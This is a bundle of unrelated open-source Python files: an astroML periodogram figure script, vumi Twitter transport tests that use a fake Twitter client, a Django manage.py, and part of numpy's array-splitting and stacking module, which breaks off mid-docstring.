# "Statistics, Data Mining, and Machine Learning in Astronomy" (2013)
# For more information, see http://astroML.github.com
# To report a bug or issue, use the following forum:
# https://groups.google.com/forum/#!forum/astroml-general
from __future__ import print_function
import numpy as np
from matplotlib import pyplot as plt
from astroML.time_series import\
lomb_scargle, search_frequencies, multiterm_periodogram
from astroML.datasets import fetch_LINEAR_sample
#----------------------------------------------------------------------
# This function adjusts matplotlib settings for a uniform feel in the textbook.
# Note that with usetex=True, fonts are rendered with LaTeX. This may
# result in an error if LaTeX is not installed on your system. In that case,
# you can set usetex to False.
from astroML.plotting import setup_text_plots
setup_text_plots(fontsize=8, usetex=True)
#id, period = 11375941, 58.4
id, period = 18525697, 17.05
data = fetch_LINEAR_sample()
t, y, dy = data[id].T
omega = np.linspace(period, period + 0.1, 1000)
fig = plt.figure(figsize=(5, 3.75))
ax = plt.subplot(211)
for n_terms in [1, 2, 3]:
P1 = multiterm_periodogram(t, y, dy, omega, n_terms=n_terms)
plt.plot(omega, P1, lw=1, label='m = %i' % n_terms)
plt.legend(loc=2)
plt.xlim(period, period + 0.1)
plt.ylim(0, 1.0)
plt.ylabel('$1 - \chi^2(\omega) / \chi^2_{ref}$')
plt.subplot(212, sharex=ax)
for generalized in [True, False]:
if generalized:
label = 'generalized LS'
else:
label = 'standard LS'
P2 = lomb_scargle(t, y, dy, omega, generalized=generalized)
plt.plot(omega, P2, lw=1, label=label)
plt.legend(loc=2)
plt.xlim(period, period + 0.1)
plt.ylim(0, 1.0)
plt.xlabel('frequency $\omega$')
plt.ylabel('$P_{LS}(\omega)$')
plt.show()
| nhuntwalker/astroML | book_figures/chapter10/fig_LS_comparison.py | Python | bsd-2-clause | 2,128 |
from twisted.internet.defer import inlineCallbacks
from txtwitter.tests.fake_twitter import FakeTwitter
from vumi.tests.utils import LogCatcher
from vumi.tests.helpers import VumiTestCase
from vumi.config import Config
from vumi.errors import ConfigError
from vumi.transports.twitter import (
ConfigTwitterEndpoints, TwitterTransport)
from vumi.transports.tests.helpers import TransportHelper
class TestTwitterEndpointsConfig(VumiTestCase):
def test_clean_no_endpoints(self):
class ToyConfig(Config):
endpoints = ConfigTwitterEndpoints("test endpoints")
self.assertRaises(ConfigError, ToyConfig, {'endpoints': {}})
def test_clean_same_endpoints(self):
class ToyConfig(Config):
endpoints = ConfigTwitterEndpoints("test endpoints")
self.assertRaises(ConfigError, ToyConfig, {'endpoints': {
'dms': 'default',
'tweets': 'default'
}})
class TestTwitterTransport(VumiTestCase):
@inlineCallbacks
def setUp(self):
self.twitter = FakeTwitter()
self.user = self.twitter.new_user('me', 'me')
self.client = self.twitter.get_client(self.user.id_str)
self.patch(
TwitterTransport, 'get_client', lambda *a, **kw: self.client)
self.tx_helper = self.add_helper(TransportHelper(TwitterTransport))
self.config = {
'screen_name': 'me',
'consumer_key': 'consumer1',
'consumer_secret': 'consumersecret1',
'access_token': 'token1',
'access_token_secret': 'tokensecret1',
'terms': ['arnold', 'the', 'term'],
'endpoints': {
'tweets': 'tweet_endpoint',
'dms': 'dm_endpoint'
}
}
self.transport = yield self.tx_helper.get_transport(self.config)
def test_config_endpoints_default(self):
del self.config['endpoints']
self.config['transport_name'] = 'twitter'
config = TwitterTransport.CONFIG_CLASS(self.config)
self.assertEqual(config.endpoints, {'tweets': 'default'})
@inlineCallbacks
def test_config_no_tracking_stream(self):
self.config['terms'] = []
transport = yield self.tx_helper.get_transport(self.config)
self.assertEqual(transport.track_stream, None)
@inlineCallbacks
def test_tracking_tweets(self):
someone = self.twitter.new_user('someone', 'someone')
tweet = self.twitter.new_tweet('arnold', someone.id_str)
[msg] = yield self.tx_helper.wait_for_dispatched_inbound(1)
self.assertEqual(msg['from_addr'], '@someone')
self.assertEqual(msg['to_addr'], 'NO_USER')
self.assertEqual(msg['content'], 'arnold')
self.assertEqual(
msg['transport_metadata'],
{'twitter': {'status_id': tweet.id_str}})
self.assertEqual(msg['helper_metadata'], {
'twitter': {
'in_reply_to_status_id': None,
'in_reply_to_screen_name': None,
'user_mentions': []
}
})
@inlineCallbacks
def test_tracking_reply_tweets(self):
someone = self.twitter.new_user('someone', 'someone')
someone_else = self.twitter.new_user('someone_else', 'someone_else')
tweet1 = self.twitter.new_tweet('@someone_else hello', someone.id_str)
tweet2 = self.twitter.new_tweet(
'@someone arnold', someone_else.id_str, reply_to=tweet1.id_str)
[msg] = yield self.tx_helper.wait_for_dispatched_inbound(1)
self.assertEqual(msg['from_addr'], '@someone_else')
self.assertEqual(msg['to_addr'], '@someone')
self.assertEqual(msg['content'], 'arnold')
self.assertEqual(
msg['transport_metadata'],
{'twitter': {'status_id': tweet2.id_str}})
self.assertEqual(msg['helper_metadata'], {
'twitter': {
'in_reply_to_status_id': tweet1.id_str,
'in_reply_to_screen_name': 'someone',
'user_mentions': [{
'id_str': someone.id_str,
'id': int(someone.id_str),
'indices': [0, 8],
'screen_name': someone.screen_name,
'name': someone.name,
}]
}
})
def test_tracking_own_messages(self):
with LogCatcher() as lc:
tweet = self.twitter.new_tweet('arnold', self.user.id_str)
tweet = tweet.to_dict(self.twitter)
self.assertTrue(any(
"Tracked own tweet:" in msg for msg in lc.messages()))
@inlineCallbacks
def test_inbound_tweet(self):
someone = self.twitter.new_user('someone', 'someone')
tweet = self.twitter.new_tweet('@me hello', someone.id_str)
[msg] = yield self.tx_helper.wait_for_dispatched_inbound(1)
self.assertEqual(msg['from_addr'], '@someone')
self.assertEqual(msg['to_addr'], '@me')
self.assertEqual(msg['content'], 'hello')
self.assertEqual(msg.get_routing_endpoint(), 'tweet_endpoint')
self.assertEqual(
msg['transport_metadata'],
{'twitter': {'status_id': tweet.id_str}})
self.assertEqual(msg['helper_metadata'], {
'twitter': {
'in_reply_to_status_id': None,
'in_reply_to_screen_name': 'me',
'user_mentions': [{
'id_str': self.user.id_str,
'id': int(self.user.id_str),
'indices': [0, 3],
'screen_name': self.user.screen_name,
'name': self.user.name,
}]
}
})
@inlineCallbacks
def test_inbound_tweet_reply(self):
someone = self.twitter.new_user('someone', 'someone')
tweet1 = self.twitter.new_tweet('@someone hello', self.user.id_str)
tweet2 = self.twitter.new_tweet(
'@me goodbye', someone.id_str, reply_to=tweet1.id_str)
[msg] = yield self.tx_helper.wait_for_dispatched_inbound(1)
self.assertEqual(msg['from_addr'], '@someone')
self.assertEqual(msg['to_addr'], '@me')
self.assertEqual(msg['content'], 'goodbye')
self.assertEqual(
msg['transport_metadata'],
{'twitter': {'status_id': tweet2.id_str}})
self.assertEqual(msg['helper_metadata'], {
'twitter': {
'in_reply_to_status_id': tweet1.id_str,
'in_reply_to_screen_name': 'me',
'user_mentions': [{
'id_str': self.user.id_str,
'id': int(self.user.id_str),
'indices': [0, 3],
'screen_name': self.user.screen_name,
'name': self.user.name,
}]
}
})
def test_inbound_own_tweet(self):
with LogCatcher() as lc:
self.twitter.new_tweet('hello', self.user.id_str)
self.assertTrue(any(
"Received own tweet on user stream" in msg
for msg in lc.messages()))
@inlineCallbacks
def test_inbound_tweet_no_endpoint(self):
self.config['endpoints'] = {'dms': 'default'}
yield self.tx_helper.get_transport(self.config)
someone = self.twitter.new_user('someone', 'someone')
with LogCatcher() as lc:
self.twitter.new_tweet('@me hello', someone.id_str)
self.assertTrue(any(
"Discarding tweet received on user stream, no endpoint "
"configured for tweets" in msg
for msg in lc.messages()))
@inlineCallbacks
def test_inbound_dm(self):
someone = self.twitter.new_user('someone', 'someone')
dm = self.twitter.new_dm('hello @me', someone.id_str, self.user.id_str)
[msg] = yield self.tx_helper.wait_for_dispatched_inbound(1)
self.assertEqual(msg['from_addr'], '@someone')
self.assertEqual(msg['to_addr'], '@me')
self.assertEqual(msg['content'], 'hello @me')
self.assertEqual(msg.get_routing_endpoint(), 'dm_endpoint')
self.assertEqual(msg['helper_metadata'], {
'dm_twitter': {
'id': dm.id_str,
'user_mentions': [{
'id_str': self.user.id_str,
'id': int(self.user.id_str),
'indices': [6, 9],
'screen_name': self.user.screen_name,
'name': self.user.name,
}]
}
})
def test_inbound_own_dm(self):
with LogCatcher() as lc:
someone = self.twitter.new_user('someone', 'someone')
self.twitter.new_dm('hello', self.user.id_str, someone.id_str)
self.assertTrue(any(
"Received own DM on user stream" in msg
for msg in lc.messages()))
@inlineCallbacks
def test_inbound_dm_no_endpoint(self):
self.config['endpoints'] = {'tweets': 'default'}
yield self.tx_helper.get_transport(self.config)
someone = self.twitter.new_user('someone', 'someone')
with LogCatcher() as lc:
self.twitter.new_dm('hello @me', someone.id_str, self.user.id_str)
self.assertTrue(any(
"Discarding DM received on user stream, no endpoint "
"configured for DMs" in msg
for msg in lc.messages()))
@inlineCallbacks
def test_auto_following(self):
self.config['autofollow'] = True
yield self.tx_helper.get_transport(self.config)
with LogCatcher() as lc:
someone = self.twitter.new_user('someone', 'someone')
self.twitter.add_follow(someone.id_str, self.user.id_str)
self.assertTrue(any(
"Received follow on user stream" in msg
for msg in lc.messages()))
self.assertTrue(any(
"Auto-following '@someone'" in msg
for msg in lc.messages()))
follow = self.twitter.get_follow(self.user.id_str, someone.id_str)
self.assertEqual(follow.source_id, self.user.id_str)
self.assertEqual(follow.target_id, someone.id_str)
@inlineCallbacks
def test_auto_following_disabled(self):
self.config['autofollow'] = False
yield self.tx_helper.get_transport(self.config)
with LogCatcher() as lc:
someone = self.twitter.new_user('someone', 'someone')
self.twitter.add_follow(someone.id_str, self.user.id_str)
self.assertTrue(any(
"Received follow on user stream" in msg
for msg in lc.messages()))
follow = self.twitter.get_follow(self.user.id_str, someone.id_str)
self.assertTrue(follow is None)
def test_inbound_own_follow(self):
with LogCatcher() as lc:
someone = self.twitter.new_user('someone', 'someone')
self.twitter.add_follow(self.user.id_str, someone.id_str)
self.assertTrue(any(
"Received own follow on user stream" in msg
for msg in lc.messages()))
@inlineCallbacks
def test_tweet_sending(self):
self.twitter.new_user('someone', 'someone')
msg = yield self.tx_helper.make_dispatch_outbound(
'hello', to_addr='@someone', endpoint='tweet_endpoint')
[ack] = yield self.tx_helper.wait_for_dispatched_events(1)
self.assertEqual(ack['user_message_id'], msg['message_id'])
tweet = self.twitter.get_tweet(ack['sent_message_id'])
self.assertEqual(tweet.text, '@someone hello')
self.assertEqual(tweet.reply_to, None)
@inlineCallbacks
def test_tweet_reply_sending(self):
tweet1 = self.twitter.new_tweet(
'hello', self.user.id_str, endpoint='tweet_endpoint')
inbound_msg = self.tx_helper.make_inbound(
'hello',
from_addr='@someone',
endpoint='tweet_endpoint',
transport_metadata={
'twitter': {'status_id': tweet1.id_str}
})
msg = yield self.tx_helper.make_dispatch_reply(inbound_msg, "goodbye")
[ack] = yield self.tx_helper.wait_for_dispatched_events(1)
self.assertEqual(ack['user_message_id'], msg['message_id'])
tweet2 = self.twitter.get_tweet(ack['sent_message_id'])
self.assertEqual(tweet2.text, '@someone goodbye')
self.assertEqual(tweet2.reply_to, tweet1.id_str)
@inlineCallbacks
def test_tweet_sending_failure(self):
def fail(*a, **kw):
raise Exception(':(')
self.patch(self.client, 'statuses_update', fail)
with LogCatcher() as lc:
msg = yield self.tx_helper.make_dispatch_outbound(
'hello', endpoint='tweet_endpoint')
self.assertEqual(
[e['message'][0] for e in lc.errors],
["'Outbound twitter message failed: :('"])
[nack] = yield self.tx_helper.wait_for_dispatched_events(1)
self.assertEqual(nack['user_message_id'], msg['message_id'])
self.assertEqual(nack['sent_message_id'], msg['message_id'])
self.assertEqual(nack['nack_reason'], ':(')
@inlineCallbacks
def test_dm_sending(self):
self.twitter.new_user('someone', 'someone')
msg = yield self.tx_helper.make_dispatch_outbound(
'hello', to_addr='@someone', endpoint='dm_endpoint')
[ack] = yield self.tx_helper.wait_for_dispatched_events(1)
self.assertEqual(ack['user_message_id'], msg['message_id'])
dm = self.twitter.get_dm(ack['sent_message_id'])
sender = self.twitter.get_user(dm.sender_id_str)
recipient = self.twitter.get_user(dm.recipient_id_str)
self.assertEqual(dm.text, 'hello')
self.assertEqual(sender.screen_name, 'me')
self.assertEqual(recipient.screen_name, 'someone')
@inlineCallbacks
def test_dm_sending_failure(self):
def fail(*a, **kw):
raise Exception(':(')
self.patch(self.client, 'direct_messages_new', fail)
with LogCatcher() as lc:
msg = yield self.tx_helper.make_dispatch_outbound(
'hello', endpoint='dm_endpoint')
self.assertEqual(
[e['message'][0] for e in lc.errors],
["'Outbound twitter message failed: :('"])
[nack] = yield self.tx_helper.wait_for_dispatched_events(1)
self.assertEqual(nack['user_message_id'], msg['message_id'])
self.assertEqual(nack['sent_message_id'], msg['message_id'])
self.assertEqual(nack['nack_reason'], ':(')
def test_track_stream_for_non_tweet(self):
with LogCatcher() as lc:
self.transport.handle_track_stream({'foo': 'bar'})
self.assertEqual(
lc.messages(),
["Received non-tweet from tracking stream: {'foo': 'bar'}"])
def test_user_stream_for_unsupported_message(self):
with LogCatcher() as lc:
self.transport.handle_user_stream({'foo': 'bar'})
self.assertEqual(
lc.messages(),
["Received a user stream message that we do not handle: "
"{'foo': 'bar'}"])
def test_tweet_content_with_mention_at_start(self):
self.assertEqual('hello', self.transport.tweet_content({
'id_str': '12345',
'text': '@fakeuser hello',
'user': {},
'entities': {
'user_mentions': [{
'id_str': '123',
'screen_name': 'fakeuser',
'name': 'Fake User',
'indices': [0, 8]
}]
},
}))
def test_tweet_content_with_mention_not_at_start(self):
self.assertEqual('hello @fakeuser!', self.transport.tweet_content({
'id_str': '12345',
'text': 'hello @fakeuser!',
'user': {},
'entities': {
'user_mentions': [{
'id_str': '123',
'screen_name': 'fakeuser',
'name': 'Fake User',
'indices': [6, 14]
}]
},
}))
def test_tweet_content_with_no_mention(self):
self.assertEqual('hello', self.transport.tweet_content({
'id_str': '12345',
'text': 'hello',
'user': {},
'entities': {
'user_mentions': []
},
}))
def test_tweet_content_with_no_user_in_text(self):
self.assertEqual('NO_USER hello', self.transport.tweet_content({
'id_str': '12345',
'text': 'NO_USER hello',
'user': {},
'entities': {
'user_mentions': []
},
}))
| TouK/vumi | vumi/transports/twitter/tests/test_twitter.py | Python | bsd-3-clause | 16,928 |
#!/usr/bin/env python
import os
import sys
import envdir
if __name__ == "__main__":
if 'test' in sys.argv:
env_dir = os.path.join('tests', 'envdir')
else:
env_dir = 'envdir'
envdir.read(os.path.join(os.path.dirname(__file__), env_dir))
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| feedhq/feedhq | manage.py | Python | bsd-3-clause | 374 |
from __future__ import division, absolute_import, print_function
import warnings
import numpy.core.numeric as _nx
from numpy.core.numeric import (
asarray, zeros, outer, concatenate, isscalar, array, asanyarray
)
from numpy.core.fromnumeric import product, reshape
from numpy.core import vstack, atleast_3d
__all__ = [
'column_stack', 'row_stack', 'dstack', 'array_split', 'split',
'hsplit', 'vsplit', 'dsplit', 'apply_over_axes', 'expand_dims',
'apply_along_axis', 'kron', 'tile', 'get_array_wrap'
]
def apply_along_axis(func1d, axis, arr, *args, **kwargs):
"""
Apply a function to 1-D slices along the given axis.
Execute `func1d(a, *args)` where `func1d` operates on 1-D arrays and `a`
is a 1-D slice of `arr` along `axis`.
Parameters
----------
func1d : function
This function should accept 1-D arrays. It is applied to 1-D
slices of `arr` along the specified axis.
axis : integer
Axis along which `arr` is sliced.
arr : ndarray
Input array.
args : any
Additional arguments to `func1d`.
kwargs: any
Additional named arguments to `func1d`.
.. versionadded:: 1.9.0
Returns
-------
apply_along_axis : ndarray
The output array. The shape of `outarr` is identical to the shape of
`arr`, except along the `axis` dimension, where the length of `outarr`
is equal to the size of the return value of `func1d`. If `func1d`
returns a scalar `outarr` will have one fewer dimensions than `arr`.
See Also
--------
apply_over_axes : Apply a function repeatedly over multiple axes.
Examples
--------
>>> def my_func(a):
... \"\"\"Average first and last element of a 1-D array\"\"\"
... return (a[0] + a[-1]) * 0.5
>>> b = np.array([[1,2,3], [4,5,6], [7,8,9]])
>>> np.apply_along_axis(my_func, 0, b)
array([ 4., 5., 6.])
>>> np.apply_along_axis(my_func, 1, b)
array([ 2., 5., 8.])
For a function that doesn't return a scalar, the number of dimensions in
`outarr` is the same as `arr`.
>>> b = np.array([[8,1,7], [4,3,9], [5,2,6]])
>>> np.apply_along_axis(sorted, 1, b)
array([[1, 7, 8],
[3, 4, 9],
[2, 5, 6]])
"""
arr = asarray(arr)
nd = arr.ndim
if axis < 0:
axis += nd
if (axis >= nd):
raise ValueError("axis must be less than arr.ndim; axis=%d, rank=%d."
% (axis, nd))
ind = [0]*(nd-1)
i = zeros(nd, 'O')
indlist = list(range(nd))
indlist.remove(axis)
i[axis] = slice(None, None)
outshape = asarray(arr.shape).take(indlist)
i.put(indlist, ind)
res = func1d(arr[tuple(i.tolist())], *args, **kwargs)
# if res is a number, then we have a smaller output array
if isscalar(res):
outarr = zeros(outshape, asarray(res).dtype)
outarr[tuple(ind)] = res
Ntot = product(outshape)
k = 1
while k < Ntot:
# increment the index
ind[-1] += 1
n = -1
while (ind[n] >= outshape[n]) and (n > (1-nd)):
ind[n-1] += 1
ind[n] = 0
n -= 1
i.put(indlist, ind)
res = func1d(arr[tuple(i.tolist())], *args, **kwargs)
outarr[tuple(ind)] = res
k += 1
return outarr
else:
Ntot = product(outshape)
holdshape = outshape
outshape = list(arr.shape)
outshape[axis] = len(res)
outarr = zeros(outshape, asarray(res).dtype)
outarr[tuple(i.tolist())] = res
k = 1
while k < Ntot:
# increment the index
ind[-1] += 1
n = -1
while (ind[n] >= holdshape[n]) and (n > (1-nd)):
ind[n-1] += 1
ind[n] = 0
n -= 1
i.put(indlist, ind)
res = func1d(arr[tuple(i.tolist())], *args, **kwargs)
outarr[tuple(i.tolist())] = res
k += 1
return outarr
def apply_over_axes(func, a, axes):
"""
Apply a function repeatedly over multiple axes.
`func` is called as `res = func(a, axis)`, where `axis` is the first
element of `axes`. The result `res` of the function call must have
either the same dimensions as `a` or one less dimension. If `res`
has one less dimension than `a`, a dimension is inserted before
`axis`. The call to `func` is then repeated for each axis in `axes`,
with `res` as the first argument.
Parameters
----------
func : function
This function must take two arguments, `func(a, axis)`.
a : array_like
Input array.
axes : array_like
Axes over which `func` is applied; the elements must be integers.
Returns
-------
apply_over_axis : ndarray
The output array. The number of dimensions is the same as `a`,
but the shape can be different. This depends on whether `func`
changes the shape of its output with respect to its input.
See Also
--------
apply_along_axis :
Apply a function to 1-D slices of an array along the given axis.
Notes
------
This function is equivalent to tuple axis arguments to reorderable ufuncs
with keepdims=True. Tuple axis arguments to ufuncs have been availabe since
version 1.7.0.
Examples
--------
>>> a = np.arange(24).reshape(2,3,4)
>>> a
array([[[ 0, 1, 2, 3],
[ 4, 5, 6, 7],
[ 8, 9, 10, 11]],
[[12, 13, 14, 15],
[16, 17, 18, 19],
[20, 21, 22, 23]]])
Sum over axes 0 and 2. The result has same number of dimensions
as the original array:
>>> np.apply_over_axes(np.sum, a, [0,2])
array([[[ 60],
[ 92],
[124]]])
Tuple axis arguments to ufuncs are equivalent:
>>> np.sum(a, axis=(0,2), keepdims=True)
array([[[ 60],
[ 92],
[124]]])
"""
val = asarray(a)
N = a.ndim
if array(axes).ndim == 0:
axes = (axes,)
for axis in axes:
if axis < 0:
axis = N + axis
args = (val, axis)
res = func(*args)
if res.ndim == val.ndim:
val = res
else:
res = expand_dims(res, axis)
if res.ndim == val.ndim:
val = res
else:
raise ValueError("function is not returning "
"an array of the correct shape")
return val
def expand_dims(a, axis):
"""
Expand the shape of an array.
Insert a new axis, corresponding to a given position in the array shape.
Parameters
----------
a : array_like
Input array.
axis : int
Position (amongst axes) where new axis is to be inserted.
Returns
-------
res : ndarray
Output array. The number of dimensions is one greater than that of
the input array.
See Also
--------
doc.indexing, atleast_1d, atleast_2d, atleast_3d
Examples
--------
>>> x = np.array([1,2])
>>> x.shape
(2,)
The following is equivalent to ``x[np.newaxis,:]`` or ``x[np.newaxis]``:
>>> y = np.expand_dims(x, axis=0)
>>> y
array([[1, 2]])
>>> y.shape
(1, 2)
>>> y = np.expand_dims(x, axis=1) # Equivalent to x[:,newaxis]
>>> y
array([[1],
[2]])
>>> y.shape
(2, 1)
Note that some examples may use ``None`` instead of ``np.newaxis``. These
are the same objects:
>>> np.newaxis is None
True
"""
a = asarray(a)
shape = a.shape
if axis < 0:
axis = axis + len(shape) + 1
return a.reshape(shape[:axis] + (1,) + shape[axis:])
row_stack = vstack
def column_stack(tup):
"""
Stack 1-D arrays as columns into a 2-D array.
Take a sequence of 1-D arrays and stack them as columns
to make a single 2-D array. 2-D arrays are stacked as-is,
just like with `hstack`. 1-D arrays are turned into 2-D columns
first.
Parameters
----------
tup : sequence of 1-D or 2-D arrays.
Arrays to stack. All of them must have the same first dimension.
Returns
-------
stacked : 2-D array
The array formed by stacking the given arrays.
See Also
--------
hstack, vstack, concatenate
Examples
--------
>>> a = np.array((1,2,3))
>>> b = np.array((2,3,4))
>>> np.column_stack((a,b))
array([[1, 2],
[2, 3],
[3, 4]])
"""
arrays = []
for v in tup:
arr = array(v, copy=False, subok=True)
if arr.ndim < 2:
arr = array(arr, copy=False, subok=True, ndmin=2).T
arrays.append(arr)
return _nx.concatenate(arrays, 1)
def dstack(tup):
"""
Stack arrays in sequence depth wise (along third axis).
Takes a sequence of arrays and stack them along the third axis
to make a single array. Rebuilds arrays divided by `dsplit`.
This is a simple way to stack 2D arrays (images) into a single
3D array for processing.
Parameters
----------
tup : sequence of arrays
Arrays to stack. All of them must have the same shape along all
but the third axis.
Returns
-------
stacked : ndarray
The array formed by stacking the given arrays.
See Also
--------
stack : Join a sequence of arrays along a new axis.
vstack : Stack along first axis.
hstack : Stack along second axis.
concatenate : Join a sequence of arrays along an existing axis.
dsplit : Split array along third axis.
Notes
-----
Equivalent to ``np.concatenate(tup, axis=2)``.
Examples
--------
>>> a = np.array((1,2,3))
>>> b = np.array((2,3,4))
>>> np.dstack((a,b))
array([[[1, 2],
[2, 3],
[3, 4]]])
>>> a = np.array([[1],[2],[3]])
>>> b = np.array([[2],[3],[4]])
>>> np.dstack((a,b))
array([[[1, 2]],
[[2, 3]],
[[3, 4]]])
"""
return _nx.concatenate([atleast_3d(_m) for _m in tup], 2)
def _replace_zero_by_x_arrays(sub_arys):
for i in range(len(sub_arys)):
if len(_nx.shape(sub_arys[i])) == 0:
sub_arys[i] = _nx.empty(0, dtype=sub_arys[i].dtype)
elif _nx.sometrue(_nx.equal(_nx.shape(sub_arys[i]), 0)):
sub_arys[i] = _nx.empty(0, dtype=sub_arys[i].dtype)
return sub_arys
def array_split(ary, indices_or_sections, axis=0):
"""
Split an array into multiple sub-arrays.
Please refer to the ``split`` documentation. The only difference
between these functions is that ``array_split`` allows
`indices_or_sections` to be an integer that does *not* equally
divide the axis.
See Also
--------
split : Split array into multiple sub-arrays of equal size.
Examples
--------
>>> x = np.arange(8.0)
>>> np.array_split(x, 3)
[array([ 0., 1., 2.]), array([ 3., 4., 5.]), array([ 6., 7.])]
"""
try:
Ntotal = ary.shape[axis]
except AttributeError:
Ntotal = len(ary)
try:
# handle scalar case.
Nsections = len(indices_or_sections) + 1
div_points = [0] + list(indices_or_sections) + [Ntotal]
except TypeError:
# indices_or_sections is a scalar, not an array.
Nsections = int(indices_or_sections)
if Nsections <= 0:
raise ValueError('number sections must be larger than 0.')
Neach_section, extras = divmod(Ntotal, Nsections)
section_sizes = ([0] +
extras * [Neach_section+1] +
(Nsections-extras) * [Neach_section])
div_points = _nx.array(section_sizes).cumsum()
sub_arys = []
sary = _nx.swapaxes(ary, axis, 0)
for i in range(Nsections):
st = div_points[i]
end = div_points[i + 1]
sub_arys.append(_nx.swapaxes(sary[st:end], axis, 0))
return sub_arys
def split(ary,indices_or_sections,axis=0):
"""
Split an array into multiple sub-arrays.
Parameters
----------
ary : ndarray
Array to be divided into sub-arrays.
indices_or_sections : int or 1-D array
If `indices_or_sections` is an integer, N, the array will be divided
into N equal arrays along `axis`. If such a split is not possible,
an error is raised.
If `indices_or_sections` is a 1-D array of sorted integers, the entries
indicate where along `axis` the array is split. For example,
``[2, 3]`` would, for ``axis=0``, result in
- ary[:2]
- ary[2:3]
- ary[3:]
If an index exceeds the dimension of the array along `axis`,
an empty sub-array is returned correspondingly.
axis : int, optional
The axis along which to split, default is 0.
Returns
-------
sub-arrays : list of ndarrays
A list of sub-arrays.
Raises
------
ValueError
If `indices_or_sections` is given as an integer, but
a split does not result in equal division.
See Also
--------
array_split : Split an array into multiple sub-arrays of equal or
near-equal size. Does not raise an exception if
an equal division cannot be made.
hsplit : Split array into multiple sub-arrays horizontally (column-wise).
vsplit : Split array into multiple sub-arrays vertically (row wise).
dsplit : Split array into multiple sub-arrays along the 3rd axis (depth).
concatenate : Join a sequence of arrays along an existing axis.
stack : Join a sequence of arrays along a new axis.
hstack : Stack arrays in sequence horizontally (column wise).
vstack : Stack arrays in sequence vertically (row wise).
dstack : Stack arrays in sequence depth wise (along third dimension).
Examples
--------
>>> x = np.arange(9.0)
>>> np.split(x, 3)
[array([ 0., 1., 2.]), array([ 3., 4., 5.]), array([ 6., 7., 8.])]
>>> x = np.arange(8.0)
>>> np.split(x, [3, 5, 6, 10])
[array([ 0., 1., 2.]),
array([ 3., 4.]),
array([ 5.]),
array([ 6., 7.]),
array([], dtype=float64)]
"""
try:
len(indices_or_sections)
except TypeError:
sections = indices_or_sections
N = ary.shape[axis]
if N % sections:
raise ValueError(
'array split does not result in an equal division')
res = array_split(ary, indices_or_sections, axis)
return res
def hsplit(ary, indices_or_sections):
"""
Split an array into multiple sub-arrays horizontally (column-wise).
Please refer to the `split` documentation. `hsplit` is equivalent
to `split` with ``axis=1``, the array is always split along the second
axis regardless of the array dimension.
See Also
--------
split : Split an array into multiple sub-arrays of equal size.
Examples
--------
>>> x = np.arange(16.0).reshape(4, 4)
>>> x
array([[ 0., 1., 2., 3.],
[ 4., 5., 6., 7.],
[ 8., 9., 10., 11.],
[ 12., 13., 14., 15.]])
>>> np.hsplit(x, 2)
[array([[ 0., 1.],
[ 4., 5.],
[ 8., 9.],
[ 12., 13.]]),
array([[ 2., 3.],
[ 6., 7.],
[ 10., 11.],
[ 14., 15.]])]
>>> np.hsplit(x, np.array([3, 6]))
[array([[ 0., 1., 2.],
[ 4., 5., 6.],
[ 8., 9., 10.],
[ 12., 13., 14.]]),
array([[ 3.],
[ 7.],
[ 11.],
[ 15.]]),
array([], dtype=float64)]
With a higher dimensional array the split is still along the second axis.
>>> x = np.arange(8.0).reshape(2, 2, 2)
>>> x
array([[[ 0., 1.],
[ 2., 3.]],
[[ 4., 5.],
[ 6., 7.]]])
>>> np.hsplit(x, 2)
[array([[[ 0., 1.]],
[[ 4., 5.]]]),
array([[[ 2., 3.]],
[[ 6., 7.]]])]
"""
if len(_nx.shape(ary)) == 0:
raise ValueError('hsplit only works on arrays of 1 or more dimensions')
if len(ary.shape) > 1:
return split(ary, indices_or_sections, 1)
else:
return split(ary, indices_or_sections, 0)
def vsplit(ary, indices_or_sections):
"""
Split an array into multiple sub-arrays vertically (row-wise).
Please refer to the ``split`` documentation. ``vsplit`` is equivalent
to ``split`` with `axis=0` (default), the array is always split along the
first axis regardless of the array dimension.
See Also
--------
split : Split an array into multiple sub-arrays of equal size.
Examples
--------
>>> x = np.arange(16.0).reshape(4, 4)
>>> x
array([[ 0., 1., 2., 3.],
[ 4., 5., 6., 7.],
[ 8., 9., 10., 11.],
[ 12., 13., 14., 15.]])
>>> np.vsplit(x, 2)
[array([[ 0., 1., 2., 3.],
[ 4., 5., 6., 7.]]),
array([[ 8., 9., 10., 11.],
[ 12., 13., 14., 15.]])]
>>> np.vsplit(x, np.array([3, 6]))
[array([[ 0., 1., 2., 3.],
[ 4., 5., 6., 7.],
[ 8., 9., 10., 11.]]),
array([[ 12., 13., 14., 15.]]),
array([], dtype=float64)]
With a higher dimensional array the split is still along the first axis.
>>> x = np.arange(8.0).reshape(2, 2, 2)
>>> x
array([[[ 0., 1.],
[ 2., 3.]],
[[ 4., 5.],
[ 6., 7.]]])
>>> np.vsplit(x, 2)
[array([[[ 0., 1.],
[ 2., 3.]]]),
array([[[ 4., 5.],
[ 6., 7.]]])]
"""
if len(_nx.shape(ary)) < 2:
raise ValueError('vsplit only works on arrays of 2 or more dimensions')
return split(ary, indices_or_sections, 0)
def dsplit(ary, indices_or_sections):
"""
Split array into multiple sub-arrays along the 3rd axis (depth).
Please refer to the `split` documentation. `dsplit` is equivalent
to `split` with ``axis=2``, the array is always split along the third
axis provided the array dimension is greater than or equal to 3.
See Also
--------
split : Split an array into multiple sub-arrays of equal size.
Examples
--------
>>> x = np.arange(16.0).reshape(2, 2, 4)
>>> x
array([[[ 0., 1., 2., 3.],
[ 4., 5., 6., 7.]],
[[ 8., 9., 10., 11.],
[ 12., 13., 14., 15.]]])
>>> np.dsplit(x, 2)
[array([[[ 0., 1.],
[ 4., 5.]],
[[ 8., 9.],
[ 12., 13.]]]),
array([[[ 2., 3.],
[ 6., 7.]],
[[ 10., 11.],
[ 14., 15.]]])]
>>> np.dsplit(x, np.array([3, 6]))
[array([[[ 0., 1., 2.],
[ 4., 5., 6.]],
[[ 8., 9., 10.],
[ 12., 13., 14.]]]),
array([[[ 3.],
[ 7.]],
[[ 11.],
[ 15.]]]),
array([], dtype=float64)]
"""
if len(_nx.shape(ary)) < 3:
raise ValueError('dsplit only works on arrays of 3 or more dimensions')
return split(ary, indices_or_sections, 2)
def get_array_prepare(*args):
"""Find the wrapper for the array with the highest priority.
In case of ties, leftmost wins. If no wrapper is found, return None
"""
wrappers = sorted((getattr(x, '__array_priority__', 0), -i,
x.__array_prepare__) for i, x in enumerate(args)
if hasattr(x, '__array_prepare__'))
if wrappers:
return wrappers[-1][-1]
return None
def get_array_wrap(*args):
"""Find the wrapper for the array with the highest priority.
